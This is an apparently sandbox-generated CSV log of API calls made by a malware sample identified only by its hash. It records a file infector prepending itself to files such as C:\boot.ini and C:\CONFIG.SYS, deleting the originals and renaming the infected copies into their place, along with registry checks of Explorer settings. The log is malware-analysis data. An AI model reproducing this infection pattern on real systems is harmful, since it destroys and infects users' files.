"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\boot.ini","dwDesiredAccess->GENERIC_READ"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\boot.ini.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000134","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000134","lpValueName->NoSimpleStartMenu"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000134","hKey->0x00000128","lpSubKey->Advanced"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->Hidden"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->ShowCompColor"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->HideFileExt"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->DontPrettyPath"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->ShowInfoTip"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->HideIcons"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->MapNetDrvBtn"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->WebView"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->Filter"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->ShowSuperHidden"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->SeparateProcess"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000134","lpValueName->NoNetCrawling"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x00000122","lpSubKey->ShellEx\IconHandler"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000122","lpValueName->DocObject"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000122","lpValueName->BrowseInPlace"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x00000122","lpSubKey->Clsid"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000013a","hKey->HKEY_CLASSES_ROOT","lpSubKey->Folder"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000013a","lpSubKey->Clsid"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000122","lpValueName->IsShortcut"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000122","lpValueName->AlwaysShowExt"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000122","lpValueName->NeverShowExt"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->47554"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->47554"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->211"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->211"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000138","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000138","lpValueName->UseDesktopIniCache"
"20190731003628.283","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\boot.ini"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\boot.ini.exe","lpNewFileName->C:\boot.ini"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000138","lpFileName->C:\CONFIG.SYS","dwDesiredAccess->GENERIC_READ"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->268"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000138","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->C:\CONFIG.SYS","dwDesiredAccess->GENERIC_READ"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\CONFIG.SYS.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->420","szExeFile->8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->47554"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->47554"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.293","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x77120000","lpFileName->oleaut32.dll"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000118","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000118","lpValueName->Com+Enabled"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\CONFIG.SYS"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\CONFIG.SYS.exe","lpNewFileName->C:\CONFIG.SYS"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000138","lpFileName->C:\cuckoo\additional\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000138","nNumberOfBytesToRead->268"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\OLE"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->MinimumFreeMemPercentageToCreateProcess"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->MinimumFreeMemPercentageToCreateObject"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000011c","lpFileName->C:\cuckoo\additional\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x0000013c","lpFileName->C:\cuckoo\additional\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000144","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000144","lpValueName->Com+Enabled"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000144","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000150","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000160","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000170","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000178","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000188","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000190","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190731003628.303","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000001a0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
